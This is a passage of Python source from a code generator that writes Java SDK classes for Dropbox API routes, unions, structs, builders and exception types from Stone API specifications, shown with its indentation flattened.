w.out('this._client = _client;')
for namespace in namespaces:
w.out('this.%s = new %s(_client);', j.param_name(namespace), j.java_class(namespace))
for namespace in namespaces:
w.out('')
w.javadoc(
"""
Returns client for issuing requests in the {@code "%s"} namespace.
""" % namespace.name,
returns="Dropbox %s client" % namespace.name
)
with w.block("public %s %s()", j.java_class(namespace), j.namespace_getter_method(namespace)):
w.out('return %s;' % j.param_name(namespace))
def generate_namespace(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
j = self.j
# add documentation to our packages
self.generate_package_javadoc(namespace)
# create class files for all namespace data types in this package
for data_type in namespace.data_types:
self.generate_data_type(data_type)
for route in namespace.routes:
# generate per-route uploader helpers
if j.request_style(route) == 'upload':
self.generate_route_uploader(route)
# generate all necessary builder classes for routes that support it
if j.has_builder(route):
self.generate_route_builder(route)
if namespace.routes:
self.generate_namespace_routes(namespace)
def _mark_special_unused_classes(self):
j = self.j
if not self.g.args.unused_classes_to_generate:
return
special_class_names = self.g.args.unused_classes_to_generate.split(', ')
if not special_class_names:
return
special_data_types = [
unwrap_nullable(data_type)[0]
for namespace in j.stone_api.namespaces.values()
for data_type in namespace.data_types
if data_type.name in special_class_names
]
all_special_data_types = set()
# mark all special types public and used, and likewise mark all of their
# referenced types as public and used
def _propagate_changes(data_type):
all_special_data_types.add(data_type)
if is_void_type(data_type) or not is_user_defined_type(data_type):
return
field_types = [unwrap_nullable(f.data_type)[0] for f in data_type.all_fields]
for field_type in field_types:
if field_type not in all_special_data_types:
_propagate_changes(field_type)
if data_type.parent_type:
if data_type.parent_type not in all_special_data_types:
_propagate_changes(data_type.parent_type)
for data_type in special_data_types:
_propagate_changes(data_type)
for data_type in all_special_data_types:
if is_user_defined_type(data_type) and not is_void_type(data_type):
data_type_fq_name = j.stone_fq_name(data_type)
# mark public
j.update_data_type_visibility(data_type_fq_name, Visibility.PUBLIC)
j.update_serializer_visibility(data_type_fq_name, Visibility.PUBLIC)
# mark as being referenced somewhere so that we generate it
j.mark_data_type_as_used(data_type)
def generate_namespace_routes(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
j = self.j
with self.class_writer(namespace) as w:
w.importer.add_imports_for_namespace(namespace)
w.write_imports()
w.out('')
w.javadoc('Routes in namespace "%s".' % namespace.name)
with w.class_block(namespace):
w.out('// namespace %s (%s)', namespace.name, ', '.join(j.get_spec_filenames(namespace)))
w.out('')
w.out('private final DbxRawClientV2 client;')
w.out('')
with w.block('public %s(DbxRawClientV2 client)', j.java_class(namespace)):
w.out('this.client = client;')
for route in namespace.routes:
w.out('')
w.out('//')
w.out('// route %s', j.url_path(route))
w.out('//')
self.generate_route_base(route)
if j.has_arg(route):
self.generate_route(route, required_only=True)
# We don't use builders if there are too few optional fields; instead we just generate
# another method overload. Download endpoints are an exception: they gained builders
# even for routes that previously had none.
has_optional_fields = is_struct_type(route.arg_data_type) and route.arg_data_type.all_optional_fields
if has_optional_fields and not j.has_builder(route.arg_data_type):
self.generate_route(route, required_only=False)
# a route can have a builder if its arg does, or if the route has a particular request
# style, so check the route for a builder instead of the arg here:
if j.has_builder(route):
self.generate_route_builder_method(route)
def generate_package_javadoc(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
w = self.w
j = self.j
requests_reference_doc = ''
# different routes may have different namespace classes based on the client configuration
# used. Go through all the route references in a namespace to figure out all the requests
# classes we have available.
request_classes = OrderedDict()
for route_ref in self.refs.routes.values():
if route_ref.namespace_name == namespace.name:
request_classes[route_ref.java_class] = None
if request_classes:
requests_reference_doc += 'See %s for a list of possible requests for this namespace.' % (
', '.join("{@link %s}" % c for c in request_classes)
)
package_doc = (
"""
{}
{}
""".format(namespace.doc or '', requests_reference_doc)
)
package_info_class = JavaClass(j.java_class(namespace).package + '.' + 'package-info')
with self.class_writer(package_info_class, package_doc=package_doc):
pass
def generate_route_base(self, route, force_public=False):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
is_download = j.request_style(route) == 'download'
is_public = force_public or (
not (is_struct_type(route.arg_data_type) or is_download)
)
if j.request_style(route) == 'upload':
returns = "Uploader used to upload the request body and finish request."
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
returns = "Downloader used to download the response body and view the server response."
return_class = j.route_downloader_class(route)
elif j.has_result(route):
returns = route.result_data_type
return_class = j.java_class(route.result_data_type)
else:
returns = None
return_class = JavaClass('void')
if is_public:
deprecated = None # automatically determine from route
visibility = 'public'
else:
deprecated = False # Don't mark private methods deprecated since we don't care
visibility = '' # package private
throws_classes = j.route_throws_classes(route)
throws = ', '.join(w.resolved_class(c) for c in throws_classes)
args = []
params = []
if j.has_arg(route):
arg_class = j.java_class(route.arg_data_type)
args.append(w.fmt('%s arg', arg_class))
params.append(('arg', route.arg_data_type.doc))
if is_download:
if is_public:
headers_var = w.fmt('%s.<%s>emptyList()',
JavaClass('java.util.Collections'),
JavaClass('com.dropbox.core.http.HttpRequestor.Header'))
else:
headers_var = '_headers'
headers_class = JavaClass.from_str('java.util.List<com.dropbox.core.http.HttpRequestor.Header>')
args.append(w.fmt('%s %s', headers_class, headers_var))
params.append((headers_var, 'Extra headers to send with request.'))
w.out('')
w.javadoc(route, returns=returns, deprecated=deprecated, params=params)
with w.block('%s %s %s(%s) throws %s',
visibility,
return_class,
j.route_method(route),
', '.join(args),
throws):
if j.request_style(route) == 'rpc':
self.generate_route_rpc_call(route, 'arg')
elif j.request_style(route) == 'upload':
self.generate_route_upload_call(route, 'arg')
elif j.request_style(route) == 'download':
self.generate_route_download_call(route, 'arg', headers_var)
else:
assert False, "unrecognized route request style: %s" % j.request_style(route)
def generate_route(self, route, required_only=True):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
assert j.has_arg(route), repr(route)
# routes with union or builtin args (e.g. UInt32, List) are always made public and should
# already be generated by generate_route_base(..).
if not is_struct_type(route.arg_data_type):
# One exception is if the route is a download style endpoint. We may have extra headers
# we need to pass up for download endpoints, so those routes are made private. So just
# generate the base route again, but force it to generate the public version without the
# extra headers argument:
if j.request_style(route) == 'download':
self.generate_route_base(route, force_public=True)
return
# should only be left with struct args
assert is_struct_type(route.arg_data_type), repr(route.arg_data_type)
arg = route.arg_data_type
result = route.result_data_type
error = route.error_data_type
if not required_only:
assert not j.has_builder(arg), "Arg %s has builder, so unpacked method unnecessary." % repr(route)
n_optional = len(arg.all_optional_fields)
# we disable boxing for this method, which can be dangerous if we have more than one
# optional argument. It will essentially prevent users from being able to use
# default values for part of their request arguments. Consider updating code if
# you want to support this.
assert n_optional == 1, "More than one optional field should permit boxing! %s" % repr(route)
if j.request_style(route) == 'upload':
returns = "Uploader used to upload the request body and finish request."
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
returns = "Downloader used to download the response body and view the server response."
return_class = j.route_downloader_class(route)
elif j.has_result(route):
returns = result
return_class = j.java_class(route.result_data_type)
else:
returns = None
return_class = JavaClass('void')
if required_only:
fields = arg.all_required_fields
else:
fields = arg.all_fields
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in fields
)
default_fields = tuple(f for f in arg.all_optional_fields if f.has_default)
doc = route.raw_doc or ''
if required_only and default_fields:
if j.has_builder(route):
doc += """
The default values for the optional request parameters will be used. See %s
for more details.""" % w.javadoc_ref(j.builder_class(route))
else:
assert len(default_fields) == 1, default_fields
default_field = default_fields[0]
doc += """
The {{@code {}}} request parameter will default to {{@code {}}} (see {{@link #{}({})}}).""".format(
j.param_name(default_field),
w.java_default_value(default_field),
j.route_method(route),
','.join(w.resolved_class(j.java_class(f, generics=False)) for f in arg.all_fields),
)
throws_classes = j.route_throws_classes(route)
throws = ', '.join(w.resolved_class(c) for c in throws_classes)
w.out('')
w.javadoc(doc, stone_elem=route, fields=fields, returns=returns, allow_defaults=False)
with w.block('public %s %s(%s) throws %s', return_class, j.route_method(route), args, throws):
arg_class = j.java_class(arg)
required_args = ', '.join(j.param_name(f) for f in arg.all_required_fields)
if required_only:
w.out('%s _arg = new %s(%s);', arg_class, arg_class, required_args)
else:
optional_fields = arg.all_optional_fields
for field in optional_fields:
# disable translation of nulls to default
self.generate_field_validation(field, allow_default=False)
if j.has_builder(arg):
# use builder to build with optional fields
w.out('%s _arg = %s.newBuilder(%s)', arg_class, arg_class, required_args)
with self.g.indent():
for field in optional_fields:
w.out('.%s(%s)', j.field_builder_method(field), j.param_name(field))
w.out('.build();')
else:
# use full constructor
all_args = ', '.join(j.param_name(f) for f in arg.all_fields)
w.out('%s _arg = new %s(%s);', arg_class, arg_class, all_args)
if j.has_result(route) or j.request_style(route) in ('upload', 'download'):
args = ['_arg']
if j.request_style(route) == 'download':
# extra request headers
args.append(w.fmt('%s.<%s>emptyList()',
JavaClass('java.util.Collections'),
JavaClass('com.dropbox.core.http.HttpRequestor.Header')))
w.out('return %s(%s);', j.route_method(route), ', '.join(args))
else:
w.out('%s(_arg);', j.route_method(route))
def generate_route_builder_method(self, route):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
assert j.has_builder(route), repr(route)
arg = route.arg_data_type
result = route.result_data_type
return_class = j.builder_class(route)
if j.request_style(route) == 'upload':
returns = "Uploader builder for configuring request parameters and instantiating an uploader."
elif j.request_style(route) == 'download':
returns = "Downloader builder for configuring the request parameters and instantiating a downloader."
else:
returns = "Request builder for configuring request parameters and completing the request."
required_fields = arg.all_required_fields
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in required_fields
)
w.out('')
w.javadoc(route, fields=required_fields, returns=returns)
with w.block('public %s %s(%s)', j.builder_class(route), j.route_builder_method(route), args):
builder_args = ', '.join(j.param_name(f) for f in required_fields)
if j.has_builder(arg):
w.out('%s argBuilder_ = %s.newBuilder(%s);',
j.builder_class(arg),
j.java_class(arg),
builder_args,
)
w.out('return new %s(this, argBuilder_);', return_class)
else:
w.out('return new %s(this, %s);', return_class, builder_args)
def translate_error_wrapper(self, route, error_wrapper_var):
assert isinstance(route, ApiRoute), repr(route)
assert isinstance(error_wrapper_var, str), repr(error_wrapper_var)
w = self.w
j = self.j
if j.has_error(route):
return w.fmt('new %s("%s", %s.getRequestId(), %s.getUserMessage(), (%s) %s.getErrorValue());',
j.route_exception_class(route),
j.url_path(route),
error_wrapper_var,
error_wrapper_var,
j.java_class(route.error_data_type),
error_wrapper_var)
else:
message = '"Unexpected error response for \\"{}\\":" + {}.getErrorValue()'.format(
format_func_name(route),
error_wrapper_var,
)
return 'new DbxApiException({}.getRequestId(), {}.getUserMessage(), {});'.format(
error_wrapper_var,
error_wrapper_var,
message)
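# Sample emitted statement for a route with a user-defined error (hypothetical names):
#   new ListFolderErrorException("2/files/list_folder", ex.getRequestId(),
#       ex.getUserMessage(), (ListFolderError) ex.getErrorValue());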
def generate_route_simple_call(self, route, arg_var, before, *other_args):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
with w.block('try'):
multiline_args = [
'this.client.getHost().%s()' % camelcase('get_' + j.route_host(route)),
'"%s"' % j.url_path(route),
arg_var if j.has_arg(route) else 'null',
'true' if j.auth_style(route) == 'noauth' else 'false',
]
multiline_args.extend(other_args)
multiline_args.extend([
w.java_serializer(route.arg_data_type),
w.java_serializer(route.result_data_type),
w.java_serializer(route.error_data_type),
])
self.g.generate_multiline_list(
multiline_args,
before=before,
after=';',
)
with self.g.block('catch (DbxWrappedException ex)'):
w.out('throw %s' % self.translate_error_wrapper(route, 'ex'))
def generate_route_rpc_call(self, route, arg_var):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
# return value is optional
before = ('return ' if j.has_result(route) else '') + 'this.client.rpcStyle'
self.generate_route_simple_call(
route,
arg_var,
before,
)
def generate_route_download_call(self, route, arg_var, headers_var):
assert isinstance(route, ApiRoute), repr(route)
# always need to return a downloader
before = 'return this.client.downloadStyle'
self.generate_route_simple_call(
route,
arg_var,
before,
headers_var,
)
def generate_route_upload_call(self, route, arg_var):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
self.g.generate_multiline_list(
(
'this.client.getHost().%s()' % camelcase('get_' + j.route_host(route)),
'"%s"' % j.url_path(route),
arg_var if j.has_arg(route) else 'null',
'true' if j.auth_style(route) == 'noauth' else 'false',
w.java_serializer(route.arg_data_type),
),
before=w.fmt('%s _uploader = this.client.uploadStyle',
JavaClass('com.dropbox.core.http.HttpRequestor.Uploader')),
after=';',
)
w.out('return new %s(_uploader, this.client.getUserId());', j.route_uploader_class(route))
def generate_data_type(self, data_type):
"""Generate a class definition for a datatype (a struct or a union)."""
assert is_user_defined_type(data_type), repr(data_type)
j = self.j
if not self.g.args.data_types_only and not j.is_used_by_client(data_type):
return
with self.class_writer(data_type) as w:
w.importer.add_imports_for_data_type(data_type)
w.write_imports()
if j.is_enum(data_type):
self.generate_data_type_enum(data_type)
elif is_union_type(data_type):
self.generate_data_type_union(data_type)
elif is_struct_type(data_type):
self.generate_data_type_struct(data_type)
else:
raise AssertionError(repr(data_type))
# generate exception classes for routes if the data type is used as an error response
if j.data_type_has_exception(data_type):
self.generate_exception_type(data_type)
def generate_data_type_enum(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
assert j.is_enum(data_type), repr(data_type)
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// union %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
self.generate_enum_values(data_type)
#
# Serialization
#
self.generate_union_serializer(data_type)
def generate_enum_values(self, data_type):
"""Generate enum values for simple unions or tags."""
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
last_index = len(data_type.all_fields) - 1
for i, field in enumerate(data_type.all_fields):
w.javadoc(field)
comment = ''
if field == data_type.catch_all_field:
assert is_void_type(field.data_type), repr(field)
comment = ' // *catch_all'
elif j.has_value(field):
comment = w.fmt(' // %s', j.java_class(field))
sep = ';' if i == last_index else ','
enum_value = j.field_enum_name(field) or j.field_tag_enum_name(field)
assert enum_value, repr(field)
w.out(enum_value + sep + comment)
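# Sample emitted values for a hypothetical union with tags "basic", "pro" and a
# catch-all tag "other":
#     BASIC,
#     PRO,
#     OTHER; // *catch_all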
def generate_data_type_union(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
class_doc = """{}
This class is {} union. Tagged union instances are always associated with a
specific tag. This means only one of the {{@code isAbc()}} methods will return {{@code
true}}. You can use {{@link #tag()}} to determine the tag associated with this instance.
""".format(data_type.doc or '', 'an open tagged' if data_type.catch_all_field else 'a tagged')
if data_type.catch_all_field:
class_doc += """
Open unions may be extended in the future with additional tags. If a new tag is
introduced that this SDK does not recognize, the {@link #%s} value will be used.
""" % j.field_static_instance(data_type.catch_all_field)
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(class_doc, stone_elem=data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// union %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
#
# Tag
#
w.out('')
w.javadoc('Discriminating tag type for {@link %s}.' % j.java_class(data_type).name)
with w.block('public enum Tag'):
self.generate_enum_values(data_type)
#
# Simple field singletons
#
all_fields = data_type.all_fields
static_fields = [f for f in all_fields if is_void_type(f.data_type)]
value_fields = [f for f in all_fields if not is_void_type(f.data_type)]
if static_fields:
w.out('')
for field in static_fields:
singleton_args = "Tag.%s" % j.field_tag_enum_name(field)
w.javadoc(field)
method_name = union_create_with_method_name(data_type, [])
w.out('public static final %s %s = new %s().%s(%s);',
j.java_class(data_type),
j.field_static_instance(field),
j.java_class(data_type),
method_name,
singleton_args,
)
#
# Instance fields
#
w.out('')
w.out('private Tag _tag;')
for field in all_fields:
if j.has_value(field):
w.out('private %s %s;', j.java_class(field, boxed=True), j.param_name(field))
#
# Constructors
#
w.out('')
w.javadoc('Private default constructor, so that object is uninitializable publicly.')
with w.block('private %s()', j.java_class(data_type)):
pass
w.out('')
def _gen_create_with_method(data_type, value_fields_subset):
w.out('')
w.javadoc(data_type,
fields=value_fields_subset,
params=OrderedDict(_tag="Discriminating tag for this instance."))
formatted_args = ', '.join(chain(
['Tag _tag'],
[
w.fmt('%s %s', j.java_class(f, boxed=True), j.param_name(f))
for f in value_fields_subset
],
))
method_name = union_create_with_method_name(data_type, value_fields_subset)
with w.block('private %s %s(%s)', j.java_class(data_type), method_name, formatted_args):
w.out('%s result = new %s();', j.java_class(data_type), j.java_class(data_type))
w.out('result._tag = _tag;')
for field in value_fields_subset:
# don't perform validation in the private constructor
w.out('result.%s = %s;', j.param_name(field), j.param_name(field))
w.out('return result;')
_gen_create_with_method(data_type, [])
for f in value_fields:
_gen_create_with_method(data_type, [f])
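# The calls above emit one tag-only private factory plus one private factory per value
# field, so every tag/value combination has a dedicated construction path without
# exposing a public constructor.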
#
# Field getters/constructors
#
w.out('')
if data_type.catch_all_field:
catch_all_doc = (
"""
If a tag returned by the server is unrecognized by this SDK,
the {@link Tag#%s} value will be used.
""" % j.field_tag_enum_name(data_type.catch_all_field)
)
else:
catch_all_doc = ""
w.javadoc(
"""
Returns the tag for this instance.
This class is a tagged union. Tagged union instances are always associated with a
specific tag. This means only one of the {{@code isXyz()}} methods will return {{@code
true}}. Callers are recommended to use the tag value in a {{@code switch}} statement to
properly handle the different values for this {{@code {}}}.
{}""".format(j.java_class(data_type).name, catch_all_doc),
stone_elem=data_type,
returns="the tag for this instance."
)
with w.block('public Tag tag()'):
w.out('return _tag;')
self.generate_data_type_union_field_methods(data_type)
#
# Helper methods
#
self.generate_hash_code(data_type)
self.generate_equals(data_type)
self.generate_to_string(data_type)
#
# Serialization
#
self.generate_union_serializer(data_type)
def generate_data_type_union_field_methods(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
value_fields = [f for f in data_type.all_fields if not is_void_type(f.data_type)]
for field in data_type.all_fields:
#
# isFieldName()
#
w.out('')
w.javadoc(
"""
Returns {@code true} if this instance has the tag {@link Tag#%s}, {@code false}
otherwise.
""" % j.field_tag_enum_name(field),
returns=(
"""
{@code true} if this instance is tagged as {@link Tag#%s},
{@code false} otherwise.
"""
) % j.field_tag_enum_name(field)
)
with w.block('public boolean %s()' % j.field_tag_match_method_name(field)):
w.out('return this._tag == Tag.%s;', j.field_tag_enum_name(field))
if j.has_value(field):
#
# Union fieldName() [factory method]
#
w.out('')
doc = (
"""
Returns an instance of {{@code {}}} that has its tag set to {{@link Tag#{}}}.
{}
""".format(j.java_class(data_type).name, j.field_tag_enum_name(field), field.doc)
)
returns = "Instance of {{@code {}}} with its tag set to {{@link Tag#{}}}.".format(
j.java_class(data_type).name, j.field_tag_enum_name(field))
w.javadoc(
doc,
stone_elem=field,
params=OrderedDict(value="value to assign to this instance.") if j.has_value(field) else (),
returns=returns,
throws=w.throws(field, "value"),
)
if j.has_value(field):
with w.block('public static %s %s(%s value)',
j.java_class(data_type),
j.field_factory_method(field),
j.java_class(field),
):
self.generate_field_validation(field, value_name="value", omit_arg_name=True,
allow_default=False)
method_name = union_create_with_method_name(data_type, [field])
w.out('return new %s().%s(Tag.%s, %s);',
j.java_class(data_type),
method_name,
j.field_tag_enum_name(field),
"value")
if is_nullable_type(field.data_type):
w.out('')
w.javadoc(doc, stone_elem=field, returns=returns)
with w.block('public static %s %s()', j.java_class(data_type), j.field_factory_method(field)):
w.out('return %s(null);', j.field_factory_method(field))
#
# getFieldNameValue()
#
w.out('')
w.javadoc(
"""
{}
This instance must be tagged as {{@link Tag#{}}}.
""".format(field.doc or '', j.field_tag_enum_name(field)),
stone_elem=field,
returns="""
The {} value associated with this instance if {{@link #{}}} is
{{@code true}}.
""".format(w.javadoc_ref(field.data_type), j.field_tag_match_method_name(field)),
throws=OrderedDict(
IllegalStateException="If {@link #%s} is {@code false}." % j.field_tag_match_method_name(field),
)
)
with w.block('public %s %s()', j.java_class(field), j.field_getter_method(field)):
with w.block('if (this._tag != Tag.%s)', j.field_tag_enum_name(field)):
w.out(
'throw new IllegalStateException("Invalid tag: required Tag.%s, but was Tag." + this._tag.name());',
j.field_tag_enum_name(field))
w.out('return %s;', j.param_name(field))
def generate_data_type_struct(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// struct %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
#
# instance fields
#
w.out('')
for field in data_type.fields:
# fields marked as protected since structs allow inheritance
w.out('protected final %s %s;', j.java_class(field), j.param_name(field))
#
# constructor.
#
# use builder or required-only constructor for default values
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in data_type.all_fields
)
doc = data_type.doc or ''
if j.has_builder(data_type):
doc += """
Use {@link newBuilder} to create instances of this class without specifying values for all optional fields.
"""
w.out('')
w.javadoc(doc, stone_elem=data_type, fields=data_type.all_fields, allow_defaults=False)
with w.block('public %s(%s)', j.java_class(data_type), args):
parent_fields = data_type.parent_type.all_fields if data_type.parent_type else ()
if parent_fields:
parent_args = ', '.join(j.param_name(f) for f in parent_fields)
w.out('super(%s);', parent_args)
for field in data_type.fields:
self.generate_field_validation(field, allow_default=False)
self.generate_field_assignment(field, allow_default=False)
# required-only constructor
if data_type.all_optional_fields:
# create a constructor with just required fields (for convenience)
required_fields = data_type.all_required_fields
required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in required_fields
)
w.out('')
w.javadoc(
"""
%s
                The default values for unset fields will be used.
                """ % (data_type.doc or ''),
stone_elem=data_type,
fields=required_fields,
)
with w.block('public %s(%s)', j.java_class(data_type), required_args):
this_args = []
for field in data_type.all_fields:
if is_nullable_type(field.data_type):
this_args.append('null')
elif field.has_default:
this_args.append(w.java_default_value(field))
else:
this_args.append(j.param_name(field))
w.out('this(%s);', ', '.join(this_args))
#
# getter methods
#
for field in data_type.all_fields:
w.out('')
if field in data_type.all_optional_fields:
returns = 'value for this field, or {@code null} if not present.'
elif j.is_java_primitive(field.data_type):
returns = 'value for this field.'
else:
returns = 'value for this field, never {@code null}.'
if field.has_default:
returns += ' Defaults to %s.' % w.java_default_value(field)
w.javadoc(field.doc or '', stone_elem=field, returns=returns)
with w.block('public %s %s()', j.java_class(field), j.field_getter_method(field)):
w.out('return %s;' % j.param_name(field))
#
# builder
#
if j.has_builder(data_type):
self.generate_struct_builder(data_type)
#
# Helper methods
#
self.generate_hash_code(data_type)
self.generate_equals(data_type)
self.generate_to_string(data_type)
#
# Serialization
#
self.generate_struct_serializer(data_type)
def generate_struct_builder(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
assert j.has_builder(data_type), repr(data_type)
parent_has_builder = data_type.parent_type and j.has_builder(data_type.parent_type)
all_required_fields = data_type.all_required_fields
fields = data_type.fields if parent_has_builder else data_type.all_fields
required_fields = [f for f in fields if f in all_required_fields]
optional_fields = [f for f in fields if f not in all_required_fields]
ancestors = get_ancestors(data_type)
all_required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in all_required_fields
)
required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in required_fields
)
w.out('')
w.javadoc(
'Returns a new builder for creating an instance of this class.',
stone_elem=data_type,
fields=all_required_fields,
returns='builder for this class.',
)
with w.block('public static %s newBuilder(%s)', j.builder_class(data_type), all_required_args):
builder_args = ', '.join(j.param_name(f) for f in all_required_fields)
w.out('return new %s(%s);', j.builder_class(data_type), builder_args)
parent_class = None
if data_type.parent_type and j.has_builder(data_type.parent_type):
parent_class = j.builder_class(data_type.parent_type)
w.out('')
w.javadoc('Builder for %s.' % w.javadoc_ref(data_type))
with w.class_block(j.builder_class(data_type), parent_class=parent_class):
#
# Instance fields
#
for field in required_fields:
w.out('protected final %s %s;', j.java_class(field), j.param_name(field))
if optional_fields:
w.out('')
for field in optional_fields:
w.out('protected %s %s;', j.java_class(field), j.param_name(field))
#
# Constructor
#
w.out('')
with w.block('protected %s(%s)', j.builder_class(data_type), all_required_args):
if parent_has_builder:
parent_required_fields = [
f for f in data_type.parent_type.all_fields if f in all_required_fields
]
if parent_required_fields:
parent_args = ', '.join(j.param_name(f) for f in parent_required_fields)
w.out('super(%s);', parent_args)
for field in required_fields:
self.generate_field_validation(field)
self.generate_field_assignment(field)
for field in optional_fields:
if is_nullable_type(field.data_type):
w.out('this.%s = null;', j.param_name(field))
else:
assert field.has_default, repr(field)
w.out('this.%s = %s;', j.param_name(field), w.java_default_value(field))
#
# Setter/Adder methods
#
self.generate_builder_methods(j.builder_class(data_type), fields)
# delegate to parent builder, but make sure we return ourselves for proper chaining
if parent_has_builder:
self.generate_builder_methods(j.builder_class(data_type),
data_type.parent_type.all_fields,
wrapped_builder_name="super")
#
# Build method
#
w.out('')
w.javadoc(
"""
                Builds an instance of %s configured with this builder's values.
""" % w.javadoc_ref(data_type),
returns='new instance of %s' % w.javadoc_ref(data_type)
)
with w.block('public %s build()', j.java_class(data_type)):
build_args = ', '.join(j.param_name(f) for f in data_type.all_fields)
w.out('return new %s(%s);', j.java_class(data_type), build_args)
def generate_builder_methods(self, builder_class, fields, wrapped_builder_name=None):
assert isinstance(builder_class, JavaClass), repr(builder_class)
assert isinstance(fields, Sequence), repr(fields)
assert all(isinstance(f, StructField) for f in fields), repr(fields)
w = self.w
j = self.j
# qualify builder name if necessary to avoid name conflicts
if wrapped_builder_name and wrapped_builder_name != 'super':
wrapped_builder_name = 'this.' + wrapped_builder_name
for field in fields:
containing_data_type = j.field_containing_data_type(field)
            if field not in containing_data_type.all_optional_fields:
continue
doc = 'Set value for optional field.'
if field.has_default:
doc += """
If left unset or set to {@code null}, defaults to {@code %s}.
""" % w.java_default_value(field)
#
# withFieldName(FieldType fieldValue);
#
w.out('')
w.javadoc(doc, stone_elem=field, fields=(field,), returns='this builder')
with w.block('public %s %s(%s %s)',
builder_class,
j.field_builder_method(field),
j.java_class(field, boxed=True), # null treated as default
j.param_name(field)):
if wrapped_builder_name:
w.out('%s.%s(%s);',
wrapped_builder_name,
j.field_builder_method(field),
j.param_name(field))
else:
self.generate_field_validation(field)
self.generate_field_assignment(field)
w.out('return this;')
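    # Illustrative sketch (hypothetical field `limit` with default 100; not
    # taken from any real spec) of the Java setter emitted above and how
    # callers chain it:
    #
    #     public Builder withLimit(Long limit) {
    #         if (limit != null) {
    #             this.limit = limit;
    #         }
    #         else {
    #             this.limit = 100L;
    #         }
    #         return this;
    #     }
    #
    #     // usage: SomeArg.newBuilder(...).withLimit(25L).build();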
def generate_exception_type(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
j = self.j
exception_class = j.exception_class(data_type)
data_type_ref = self.refs.data_type(data_type)
route_refs = [
ref for ref in self.refs.routes.values()
if ref.error_ref == data_type_ref
]
with self.class_writer(exception_class) as w:
w.importer.add_imports_for_exception_type(data_type)
w.write_imports()
route_javadoc_refs = oxford_comma_list([w.javadoc_ref(r) for r in route_refs])
w.out('')
w.javadoc(
"""
Exception thrown when the server responds with a {} error.
This exception is raised by {}.
""".format(w.javadoc_ref(data_type), route_javadoc_refs)
)
with w.class_block(exception_class, parent_class=JavaClass('com.dropbox.core.DbxApiException')):
w.out('// exception for routes:')
for route_ref in route_refs:
w.out('// %s', route_ref.url_path)
w.out('')
w.out('private static final long serialVersionUID = 0L;')
w.out('')
w.javadoc('The error reported by %s.' % route_javadoc_refs)
w.out('public final %s errorValue;', j.java_class(data_type))
w.out('')
with w.block('public %s(String routeName, String requestId, LocalizedText userMessage, %s errorValue)',
exception_class, j.java_class(data_type)):
w.out('super(requestId, userMessage, buildMessage(routeName, userMessage, errorValue));')
with w.block('if (errorValue == null)'):
w.out('throw new NullPointerException("errorValue");')
w.out('this.errorValue = errorValue;')
def generate_route_uploader(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
assert j.request_style(route) == 'upload'
with self.class_writer(j.route_uploader_class(route)) as w:
w.importer.add_imports_for_route_uploader(route)
w.write_imports()
result_class = j.java_class(route.result_data_type, boxed=True)
error_class = j.java_class(route.error_data_type, boxed=True)
exception_class = j.route_exception_class(route)
parent_class = JavaClass('com.dropbox.core.DbxUploader',
generics=(result_class, error_class, exception_class))
w.out('')
w.javadoc(
"""
The {{@link DbxUploader}} returned by {}.
Use this class to upload data to the server and complete the request.
This class should be properly closed after use to prevent resource leaks and allow
network connection reuse. Always call {{@link #close}} when complete (see {}
for examples).
""".format(w.javadoc_ref(route), w.javadoc_ref(JavaClass('com.dropbox.core.DbxUploader')))
)
with w.class_block(j.route_uploader_class(route), parent_class=parent_class):
w.out('')
w.javadoc(
'Creates a new instance of this uploader.',
params=(('httpUploader', 'Initiated HTTP upload request'),),
throws=(('NullPointerException', 'if {@code httpUploader} is {@code null}'),)
)
with w.block('public %s(HttpRequestor.Uploader httpUploader, String userId)',
j.route_uploader_class(route)):
w.out('super(httpUploader, %s, %s, userId);',
w.java_serializer(route.result_data_type),
w.java_serializer(route.error_data_type))
w.out('')
with w.block('protected %s newException(DbxWrappedException error)', exception_class):
w.out('return %s', self.translate_error_wrapper(route, 'error'))
def generate_route_builder(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
assert j.has_builder(route), repr(route)
arg = route.arg_data_type
with self.class_writer(j.builder_class(route)) as w:
result_class = j.java_class(route.result_data_type, boxed=True)
error_class = j.java_class(route.error_data_type, boxed=True)
exception_class = j.route_exception_class(route)
if j.request_style(route) == 'upload':
parent_class = JavaClass('com.dropbox.core.v2.DbxUploadStyleBuilder',
generics=(result_class, error_class, exception_class))
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
